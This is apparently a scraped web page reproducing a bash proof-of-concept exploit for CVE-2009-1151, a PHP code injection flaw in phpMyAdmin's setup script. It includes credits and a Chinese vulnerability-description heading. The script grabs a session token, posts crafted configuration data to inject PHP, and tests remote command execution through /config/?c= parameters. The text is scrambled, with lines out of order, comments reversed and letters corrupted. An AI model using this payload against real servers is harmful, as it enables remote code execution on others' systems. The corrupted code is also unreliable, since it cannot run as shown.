#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null Token=`curl -ks -c $cookiejar -url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`Įcho " checking if phpMyAdmin exists on URL provided. i.e.:"Įcho " $3/config/?c=ls+-l+/"Įcho " $3/config/?p=phpinfo() "Įcho " please send any feedback/improvements for this script to" ""Įcho " no luck injecting to $3/config/ :("Ĭookiejar="/tmp/$(basename $0).$RANDOM.txt" If curl -ks -url "$3/config/" | grep "phpinfo()" >/dev/nullĬurl -ks -url "$3/config/" >$flagĮcho " success! phpinfo() injected successfully! output saved on $flag"Ĭurl -ks -b $2 -d $postdata2 -url "$3/scripts/setup.php" >/dev/nullĮcho " you *should* now be able to remotely run shell commands and PHP code using your browser. "Ĭurl -ks -b $2 -d "$postdata" -url "$3/scripts/setup.php" >/dev/null Postdata="token=$1&action=save&configuration=""a:1:&eoltype=unix"įlag="/tmp/$(basename $0).$"Įcho " attempting to inject phpinfo(). # where ‘/scripts/setup.php‘ tries to create ‘‘ which is whereĮcho "sorry but you need curl for this script to work!"Įcho "on Debian/Ubuntu: sudo apt-get install curl"
# 3) administrator must have NOT deleted the ‘/config/‘ directory # the *wizard* method, rather than manual method: # where the administrator has chosen to install phpMyAdmin following # 2) it *seems* this vuln can only be exploited against environments # PoC script successfully tested on the following targets: # and to str0ke () for testing this PoC script and providing feedback! # special thanks to Greg Ose () for discovering such a cool vuln, # CVE-2009-1151: phpMyAdmin ‘/scripts/setup.php‘ PHP Code Injection RCE PoC v0.11 漏洞描述Insufficient output sanitizing when generating configuration file
0 kommentar(er)
